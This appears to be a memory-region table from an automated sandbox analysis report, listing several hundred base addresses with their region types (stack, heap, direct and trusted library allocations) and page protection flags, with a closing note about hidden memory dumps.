2FCE000
stack
page read and write
130434A4000
heap
page read and write
55A0000
direct allocation
page execute and read and write
4220000
trusted library allocation
page read and write
1200000
direct allocation
page read and write
70F0000
trusted library allocation
page read and write
F53000
heap
page read and write
4B7F000
stack
page read and write
10AA000
heap
page read and write
3C4D000
stack
page read and write
5FEE000
stack
page read and write
546C000
stack
page read and write
7FFD34470000
trusted library allocation
page read and write
7FFD341F2000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
12A4000
heap
page read and write
1492000
heap
page read and write
57A15FE000
stack
page read and write
2ACE000
stack
page read and write
2F4E000
heap
page read and write
FB1000
unkown
page execute and read and write
72B0000
trusted library allocation
page read and write
F70000
heap
page read and write
130433C0000
heap
page read and write
178E3BE0000
heap
page read and write
7000000
heap
page read and write
10E7000
heap
page read and write
4801000
heap
page read and write
FF6000
heap
page read and write
147E000
heap
page read and write
12A4000
heap
page read and write
1479000
heap
page read and write
6D51000
heap
page read and write
F40000
heap
page read and write
7FFD341FD000
trusted library allocation
page execute and read and write
7160000
heap
page read and write
4F8B000
stack
page read and write
178E3CBE000
heap
page read and write
1650000
direct allocation
page read and write
146D000
heap
page read and write
4D00000
direct allocation
page execute and read and write
643F000
trusted library allocation
page read and write
6730000
trusted library allocation
page read and write
7E20000
heap
page read and write
178E3D39000
heap
page read and write
6FA0000
heap
page read and write
12A4000
heap
page read and write
3FC000
stack
page read and write
862B000
stack
page read and write
7055000
heap
page read and write
1340000
heap
page read and write
4C32000
heap
page read and write
FA0000
heap
page read and write
2DFE000
stack
page read and write
7DEE000
stack
page read and write
4247000
heap
page read and write
1068000
heap
page read and write
5280000
direct allocation
page execute and read and write
12A4000
heap
page read and write
51F0000
direct allocation
page execute and read and write
53D0000
trusted library allocation
page read and write
13A0000
heap
page read and write
13B0000
heap
page read and write
13043360000
heap
page read and write
6750000
heap
page read and write
6E50000
heap
page read and write
178E3C80000
heap
page read and write
4801000
heap
page read and write
7FFD34310000
trusted library allocation
page execute and read and write
178E3D27000
heap
page read and write
1304605D000
trusted library allocation
page read and write
8B0000
heap
page read and write
2EF1000
heap
page read and write
513F000
stack
page read and write
742000
unkown
page readonly
5260000
direct allocation
page execute and read and write
F60000
heap
page read and write
1056000
heap
page read and write
69DB000
stack
page read and write
344F000
stack
page read and write
178E3D0E000
heap
page read and write
57A18FB000
stack
page read and write
46BE000
stack
page read and write
51E0000
direct allocation
page execute and read and write
55D0000
direct allocation
page execute and read and write
1305D4F4000
heap
page read and write
2A8F000
stack
page read and write
970000
direct allocation
page read and write
3470000
heap
page read and write
4C60000
direct allocation
page execute and read and write
4630000
direct allocation
page read and write
2D7F000
stack
page read and write
4C21000
heap
page read and write
12A4000
heap
page read and write
9F6836000
stack
page read and write
4721000
trusted library allocation
page read and write
1689000
heap
page read and write
4641000
heap
page read and write
4A8F000
stack
page read and write
390F000
stack
page read and write
4801000
heap
page read and write
178E3D12000
heap
page read and write
6FA8000
heap
page read and write
1494000
heap
page read and write
663E000
stack
page read and write
C90000
unkown
page read and write
5230000
direct allocation
page execute and read and write
50FE000
stack
page read and write
5610000
direct allocation
page execute and read and write
6290000
heap
page read and write
12A4000
heap
page read and write
7FFD34510000
trusted library allocation
page read and write
4A7E000
stack
page read and write
3F8F000
stack
page read and write
1650000
direct allocation
page read and write
7FFD342D6000
trusted library allocation
page execute and read and write
10D1000
heap
page read and write
2CBE000
stack
page read and write
3CBE000
stack
page read and write
F9E000
heap
page read and write
11E0000
direct allocation
page read and write
2F57000
heap
page read and write
C90000
unkown
page readonly
628C000
heap
page read and write
417F000
stack
page read and write
C80000
direct allocation
page execute and read and write
178E3CBE000
heap
page read and write
82B5000
trusted library allocation
page read and write
147B000
heap
page read and write
6FCA000
heap
page read and write
4BCF000
stack
page read and write
4801000
heap
page read and write
4DE0000
direct allocation
page execute and read and write
4801000
heap
page read and write
539E000
stack
page read and write
1650000
direct allocation
page read and write
6280000
heap
page read and write
434F000
stack
page read and write
443E000
stack
page read and write
3FCF000
stack
page read and write
970000
direct allocation
page read and write
6FD000
stack
page read and write
4801000
heap
page read and write
F70000
heap
page read and write
477F000
trusted library allocation
page read and write
303F000
stack
page read and write
147B000
heap
page read and write
F70000
heap
page read and write
4801000
heap
page read and write
57A11FE000
stack
page read and write
46CC000
stack
page read and write
4800000
heap
page read and write
71C000
unkown
page readonly
F44000
heap
page read and write
2D4E000
stack
page read and write
15F4000
heap
page read and write
3A4F000
stack
page read and write
4641000
heap
page read and write
617E000
stack
page read and write
348E000
stack
page read and write
2E8E000
stack
page read and write
11CA000
stack
page read and write
12EE000
stack
page read and write
35C000
stack
page read and write
EF0000
heap
page read and write
3A8E000
stack
page read and write
FAE000
heap
page read and write
5240000
direct allocation
page execute and read and write
4E8E000
stack
page read and write
FA1000
unkown
page execute and read and write
3ACF000
stack
page read and write
2DF7000
heap
page read and write
2F57000
heap
page read and write
8AE7000
heap
page read and write
C62000
unkown
page execute and write copy
4240000
heap
page read and write
2F38000
heap
page read and write
6281000
heap
page read and write
70BE000
stack
page read and write
FCA000
heap
page read and write
41CF000
stack
page read and write
42BF000
stack
page read and write
12A4000
heap
page read and write
503E000
stack
page read and write
FF8000
heap
page read and write
43FF000
stack
page read and write
725D000
stack
page read and write
1304658D000
trusted library allocation
page read and write
494F000
stack
page read and write
457F000
stack
page read and write
438F000
stack
page read and write
3F8E000
stack
page read and write
178E3D0E000
heap
page read and write
BA4000
heap
page read and write
180E5F80000
trusted library allocation
page execute
F9A000
unkown
page execute and read and write
876E000
stack
page read and write
45A2000
trusted library allocation
page read and write
178E3D99000
heap
page read and write
7270000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
BA4000
heap
page read and write
320E000
stack
page read and write
1650000
direct allocation
page read and write
89A000
stack
page read and write
51B0000
direct allocation
page execute and read and write
F54000
heap
page read and write
F20000
heap
page read and write
3B7F000
stack
page read and write
4801000
heap
page read and write
4801000
heap
page read and write
5180000
direct allocation
page execute and read and write
3250000
direct allocation
page read and write
7330000
trusted library allocation
page read and write
178E3DA1000
heap
page read and write
32BF000
stack
page read and write
4AB3000
trusted library allocation
page read and write
4E97000
heap
page read and write
C90000
unkown
page read and write
1305549D000
trusted library allocation
page read and write
380F000
stack
page read and write
4801000
heap
page read and write
1056000
heap
page read and write
6FE7000
heap
page read and write
13043407000
heap
page read and write
40BE000
stack
page read and write
180E5A90000
heap
page read and write
4F91000
heap
page read and write
4C10000
direct allocation
page read and write
544E000
stack
page read and write
38BF000
stack
page read and write
7DF0000
heap
page read and write
420E000
stack
page read and write
2E70000
heap
page read and write
750000
heap
page read and write
50B0000
direct allocation
page read and write
4801000
heap
page read and write
7150000
heap
page read and write
4630000
direct allocation
page read and write
A80000
trusted library allocation
page read and write
310E000
stack
page read and write
2F57000
heap
page read and write
FD5000
heap
page read and write
180E5E38000
heap
page read and write
8230000
trusted library allocation
page read and write
C62000
unkown
page execute and read and write
71C000
unkown
page readonly
47FF000
stack
page read and write
15AE000
stack
page read and write
5240000
direct allocation
page execute and read and write
4801000
heap
page read and write
180E5E39000
heap
page read and write
51A0000
direct allocation
page execute and read and write
460F000
stack
page read and write
147E000
heap
page read and write
2EAA000
heap
page read and write
42FE000
stack
page read and write
4710000
heap
page execute and read and write
CF2000
unkown
page execute and read and write
2F38000
heap
page read and write
10DD000
heap
page read and write
4801000
heap
page read and write
4801000
heap
page read and write
4801000
heap
page read and write
1305D863000
heap
page read and write
458F000
stack
page read and write
338E000
stack
page read and write
7320000
trusted library allocation
page read and write
FFC000
heap
page read and write
52A0000
direct allocation
page execute and read and write
3FCE000
stack
page read and write
2A4E000
stack
page read and write
484F000
stack
page read and write
4801000
heap
page read and write
30CF000
stack
page read and write
498E000
stack
page read and write
5290000
direct allocation
page execute and read and write
4D0F000
stack
page read and write
2878000
heap
page read and write
10BE000
heap
page read and write
52E0000
direct allocation
page execute and read and write
4801000
heap
page read and write
178E3CF2000
heap
page read and write
760000
heap
page read and write
BA4000
heap
page read and write
4E70000
direct allocation
page execute and read and write
970000
direct allocation
page read and write
1450000
heap
page read and write
68CE000
stack
page read and write
F9A000
unkown
page execute and read and write
7FFD34400000
trusted library allocation
page read and write
3C0E000
stack
page read and write
C62000
unkown
page execute and read and write
357E000
stack
page read and write
474E000
stack
page read and write
5729000
trusted library allocation
page read and write
DFE000
stack
page read and write
6291000
heap
page read and write
10A3000
heap
page read and write
11E0000
direct allocation
page read and write
DDB000
stack
page read and write
4C10000
direct allocation
page read and write
1305D4FF000
heap
page read and write
B6D000
stack
page read and write
4B81000
heap
page read and write
12A4000
heap
page read and write
681000
unkown
page execute read
470F000
stack
page read and write
4801000
heap
page read and write
10C6000
heap
page read and write
FCA000
heap
page read and write
147E000
heap
page read and write
450E000
stack
page read and write
9F758F000
stack
page read and write
7FFD3420B000
trusted library allocation
page read and write
5270000
direct allocation
page execute and read and write
180E5E39000
heap
page read and write
5570000
direct allocation
page execute and read and write
2F0D000
heap
page read and write
4C0F000
stack
page read and write
13055431000
trusted library allocation
page read and write
4801000
heap
page read and write
3EFF000
stack
page read and write
180E5B51000
trusted library allocation
page read and write
12A4000
heap
page read and write
434E000
stack
page read and write
5240000
direct allocation
page execute and read and write
384F000
stack
page read and write
178E3D24000
heap
page read and write
3270000
direct allocation
page execute and read and write
F0A000
unkown
page execute and read and write
10E0000
heap
page read and write
7009000
heap
page read and write
6391000
trusted library allocation
page read and write
1044000
heap
page read and write
4630000
direct allocation
page read and write
4ACF000
stack
page read and write
F21000
unkown
page execute and write copy
13BE000
heap
page read and write
5560000
direct allocation
page execute and read and write
12A4000
heap
page read and write
1305D897000
heap
page read and write
2F38000
heap
page read and write
398E000
stack
page read and write
130433C8000
heap
page read and write
15F4000
heap
page read and write
BA4000
heap
page read and write
19AF000
stack
page read and write
41BE000
stack
page read and write
1650000
direct allocation
page read and write
2E4F000
stack
page read and write
7FFD344E0000
trusted library allocation
page read and write
12A4000
heap
page read and write
7FFD34550000
trusted library allocation
page read and write
13044E70000
heap
page read and write
178E3EAE000
heap
page read and write
FAA000
heap
page read and write
4E90000
heap
page read and write
FA1000
heap
page read and write
2B90000
heap
page read and write
4FCE000
stack
page read and write
FB1000
unkown
page execute and read and write
C69000
unkown
page read and write
7035000
heap
page read and write
12A4000
heap
page read and write
343E000
stack
page read and write
4630000
direct allocation
page read and write
4CAF000
heap
page read and write
3D0E000
stack
page read and write
13044E13000
trusted library allocation
page read and write
4801000
heap
page read and write
34FE000
stack
page read and write
11E0000
direct allocation
page read and write
A6C000
stack
page read and write
5550000
direct allocation
page execute and read and write
13043635000
heap
page read and write
3E8E000
stack
page read and write
180E5F20000
trusted library allocation
page read and write
627E000
stack
page read and write
990000
direct allocation
page read and write
2F3E000
heap
page read and write
4610000
heap
page read and write
4801000
heap
page read and write
3F3E000
stack
page read and write
147B000
heap
page read and write
74E000
stack
page read and write
11E0000
direct allocation
page read and write
4CA6000
heap
page read and write
13044E10000
trusted library allocation
page read and write
678E000
stack
page read and write
7FFD34450000
trusted library allocation
page read and write
7FFD344A0000
trusted library allocation
page read and write
15F4000
heap
page read and write
F53000
heap
page read and write
EAE000
stack
page read and write
1056000
heap
page read and write
96D000
heap
page read and write
1411000
heap
page read and write
4801000
heap
page read and write
6A6E000
stack
page read and write
FB1000
unkown
page execute and write copy
1210000
heap
page read and write
EDE000
unkown
page execute and read and write
1492000
heap
page read and write
6AED000
stack
page read and write
F52000
heap
page read and write
298F000
stack
page read and write
CF9000
unkown
page read and write
37CF000
stack
page read and write
7280000
trusted library allocation
page read and write
1154000
unkown
page execute and read and write
180E5B53000
trusted library allocation
page read and write
109C000
heap
page read and write
46CF000
stack
page read and write
6ADD000
stack
page read and write
1305D883000
heap
page read and write
F70000
heap
page read and write
7FFD34430000
trusted library allocation
page read and write
4641000
heap
page read and write
15F4000
heap
page read and write
7FFD342A0000
trusted library allocation
page read and write
101D000
heap
page read and write
BA4000
heap
page read and write
1005000
heap
page read and write
4C10000
direct allocation
page read and write
2FFF000
stack
page read and write
1305D4AB000
heap
page read and write
7151000
heap
page read and write
554F000
stack
page read and write
178E3C60000
trusted library allocation
page read and write
15F4000
heap
page read and write
4F91000
heap
page read and write
10AD000
heap
page read and write
7FFD34410000
trusted library allocation
page read and write
4801000
heap
page read and write
388E000
stack
page read and write
178E3CDE000
heap
page read and write
358F000
stack
page read and write
115C000
stack
page read and write
5150000
direct allocation
page execute and read and write
4D4E000
stack
page read and write
4876000
trusted library allocation
page read and write
4DC000
stack
page read and write
1464000
heap
page read and write
4F91000
heap
page read and write
5240000
direct allocation
page execute and read and write
7FFD341F4000
trusted library allocation
page read and write
10CA000
heap
page read and write
5160000
direct allocation
page execute and read and write
147A000
heap
page read and write
13043390000
heap
page read and write
9F6B3E000
stack
page read and write
5570000
direct allocation
page execute and read and write
45A0000
trusted library allocation
page read and write
377F000
stack
page read and write
7FFD34390000
trusted library allocation
page read and write
178E3AE0000
heap
page read and write
178E3D24000
heap
page read and write
1240000
heap
page read and write
1063000
heap
page read and write
FA1000
unkown
page execute and read and write
F52000
heap
page read and write
4DD0000
direct allocation
page execute and read and write
101F000
heap
page read and write
35CE000
stack
page read and write
38FF000
stack
page read and write
7150000
trusted library allocation
page read and write
1156000
unkown
page execute and write copy
E8B000
unkown
page execute and read and write
286C000
heap
page read and write
DFB000
unkown
page execute and read and write
484E000
stack
page read and write
1650000
direct allocation
page read and write
130470DB000
trusted library allocation
page read and write
57A10FE000
stack
page read and write
6FF3000
heap
page read and write
7FFD343D2000
trusted library allocation
page read and write
178E3CBE000
heap
page read and write
15F4000
heap
page read and write
C69000
unkown
page write copy
F11000
unkown
page execute and read and write
2C0E000
stack
page read and write
52B0000
direct allocation
page execute and read and write
F70000
heap
page read and write
147E000
heap
page read and write
39CE000
stack
page read and write
11DE000
stack
page read and write
FFB000
heap
page read and write
740000
heap
page read and write
57A0EFE000
stack
page read and write
11E0000
direct allocation
page read and write
4DE0000
direct allocation
page execute and read and write
12A4000
heap
page read and write
38FE000
stack
page read and write
3C7F000
stack
page read and write
4820000
heap
page read and write
3A7E000
stack
page read and write
367E000
stack
page read and write
36CE000
stack
page read and write
5240000
direct allocation
page execute and read and write
130453F0000
heap
page execute and read and write
6CCE000
stack
page read and write
9F693E000
stack
page read and write
4DC0000
direct allocation
page execute and read and write
F44000
heap
page read and write
178E3D24000
heap
page read and write
148D000
heap
page read and write
178E3C5D000
heap
page read and write
167B000
heap
page read and write
4801000
heap
page read and write
FA3000
heap
page read and write
130433FF000
heap
page read and write
4C70000
direct allocation
page execute and read and write
707A000
heap
page read and write
180E5E20000
heap
page read and write
324E000
stack
page read and write
74C000
unkown
page read and write
1071000
heap
page read and write
178E3CDE000
heap
page read and write
7FFD34490000
trusted library allocation
page read and write
4E60000
direct allocation
page execute and read and write
15F4000
heap
page read and write
2F0D000
heap
page read and write
12A4000
heap
page read and write
FB5000
heap
page read and write
674F000
stack
page read and write
970000
direct allocation
page read and write
2EF2000
heap
page read and write
DCE000
stack
page read and write
4C10000
direct allocation
page read and write
9F6779000
stack
page read and write
4641000
heap
page read and write
9F66FD000
stack
page read and write
33BF000
stack
page read and write
4801000
heap
page read and write
4C22000
heap
page read and write
103F000
heap
page read and write
178E3C8E000
heap
page read and write
3E4F000
stack
page read and write
CF9000
unkown
page write copy
742000
unkown
page readonly
2EC8000
heap
page read and write
49CE000
stack
page read and write
FB2000
heap
page read and write
443F000
stack
page read and write
407E000
stack
page read and write
4630000
direct allocation
page read and write
15F4000
heap
page read and write
408F000
stack
page read and write
688F000
stack
page read and write
178E3D0F000
heap
page read and write
3250000
direct allocation
page read and write
4801000
heap
page read and write
1055000
heap
page read and write
55C0000
direct allocation
page execute and read and write
1056000
heap
page read and write
4B1E000
stack
page read and write
1650000
direct allocation
page read and write
180E5B55000
trusted library allocation
page read and write
1474000
heap
page read and write
180E5E39000
heap
page read and write
367F000
stack
page read and write
872C000
stack
page read and write
2F57000
heap
page read and write
4FC0000
trusted library allocation
page read and write
2DF0000
heap
page read and write
2DD0000
direct allocation
page execute and read and write
4DE0000
direct allocation
page execute and read and write
470E000
stack
page read and write
12A4000
heap
page read and write
4223000
trusted library allocation
page execute and read and write
178E3D1F000
heap
page read and write
42FF000
stack
page read and write
6B8D000
stack
page read and write
CF9000
unkown
page read and write
12A4000
heap
page read and write
5046000
trusted library allocation
page read and write
C91000
unkown
page execute and write copy
330F000
stack
page read and write
9E9000
heap
page read and write
303E000
stack
page read and write
5190000
direct allocation
page execute and read and write
3BCF000
stack
page read and write
970000
direct allocation
page read and write
1305D4EC000
heap
page read and write
353E000
stack
page read and write
FB1000
heap
page read and write
F10000
heap
page read and write
BA0000
heap
page read and write
7FFD344B0000
trusted library allocation
page read and write
680000
unkown
page readonly
320E000
stack
page read and write
3504000
heap
page read and write
45C0000
trusted library allocation
page read and write
990000
direct allocation
page read and write
3E4E000
stack
page read and write
970000
direct allocation
page read and write
2F4E000
heap
page read and write
12A4000
heap
page read and write
2F38000
heap
page read and write
12A4000
heap
page read and write
4C90000
direct allocation
page execute and read and write
30BE000
stack
page read and write
10A1000
heap
page read and write
109E000
heap
page read and write
524E000
stack
page read and write
11E0000
direct allocation
page read and write
4801000
heap
page read and write
5194000
heap
page read and write
52C0000
direct allocation
page execute and read and write
348F000
stack
page read and write
1401000
heap
page read and write
109C000
heap
page read and write
7FFD34530000
trusted library allocation
page read and write
147C000
heap
page read and write
69CF000
stack
page read and write
12A4000
heap
page read and write
E8B000
unkown
page execute and read and write
FCA000
heap
page read and write
3C0F000
stack
page read and write
689D000
stack
page read and write
7FFD34540000
trusted library allocation
page read and write
109C000
heap
page read and write
32FE000
stack
page read and write
407F000
stack
page read and write
4801000
heap
page read and write
C6B000
unkown
page execute and read and write
9F61DE000
stack
page read and write
2840000
heap
page read and write
7FFD343F0000
trusted library allocation
page read and write
6AAA000
stack
page read and write
970000
direct allocation
page read and write
18AE000
stack
page read and write
1650000
direct allocation
page read and write
970000
direct allocation
page read and write
4C10000
direct allocation
page read and write
2F3E000
heap
page read and write
102D000
heap
page read and write
E8B000
unkown
page execute and read and write
7D10000
heap
page read and write
6397000
trusted library allocation
page read and write
4E93000
heap
page read and write
12A4000
heap
page read and write
13046B8E000
trusted library allocation
page read and write
4E4F000
stack
page read and write
4CD0000
direct allocation
page execute and read and write
7FFD342AC000
trusted library allocation
page execute and read and write
4801000
heap
page read and write
BA4000
heap
page read and write
7FFD343E0000
trusted library allocation
page execute and read and write
1088000
heap
page read and write
317E000
stack
page read and write
178E3D1F000
heap
page read and write
A18000
heap
page read and write
34CE000
stack
page read and write
4640000
heap
page read and write
5E4E000
stack
page read and write
4E10000
direct allocation
page execute and read and write
5570000
direct allocation
page execute and read and write
4801000
heap
page read and write
FB2000
unkown
page execute and write copy
C6E000
stack
page read and write
C62000
unkown
page execute and write copy
10C4000
unkown
page execute and read and write
2F57000
heap
page read and write
1439000
heap
page read and write
4801000
heap
page read and write
50B0000
direct allocation
page read and write
F70000
heap
page read and write
4C60000
direct allocation
page execute and read and write
461E000
stack
page read and write
13046CE4000
trusted library allocation
page read and write
47FE000
stack
page read and write
750000
unkown
page write copy
3DBF000
stack
page read and write
FB2000
unkown
page execute and write copy
2787000
heap
page read and write
721E000
stack
page read and write
4801000
heap
page read and write
6740000
heap
page read and write
12A4000
heap
page read and write
4660000
heap
page readonly
15F4000
heap
page read and write
6430000
trusted library allocation
page read and write
5F4F000
stack
page read and write
7E4D000
heap
page read and write
2F4B000
heap
page read and write
821E000
stack
page read and write
9F67BE000
stack
page read and write
6645000
heap
page read and write
CF9000
unkown
page write copy
281E000
stack
page read and write
5190000
heap
page read and write
11F0000
heap
page read and write
819E000
stack
page read and write
8220000
trusted library allocation
page read and write
374E000
stack
page read and write
4801000
heap
page read and write
9F65FF000
stack
page read and write
4801000
heap
page read and write
2BCF000
stack
page read and write
12A4000
heap
page read and write
40CE000
stack
page read and write
7290000
trusted library allocation
page read and write
4630000
direct allocation
page read and write
55ED000
stack
page read and write
15F0000
heap
page read and write
1200000
direct allocation
page read and write
48FF000
stack
page read and write
3F7E000
stack
page read and write
520E000
stack
page read and write
3E8F000
stack
page read and write
A4E000
stack
page read and write
4801000
heap
page read and write
1007000
heap
page read and write
1304344D000
heap
page read and write
2F8F000
stack
page read and write
4801000
heap
page read and write
488E000
stack
page read and write
C5E000
stack
page read and write
31BE000
stack
page read and write
12A4000
heap
page read and write
12A4000
heap
page read and write
11E0000
direct allocation
page read and write
1304340D000
heap
page read and write
130470D9000
trusted library allocation
page read and write
There are 1483 hidden memdumps, click here to show them.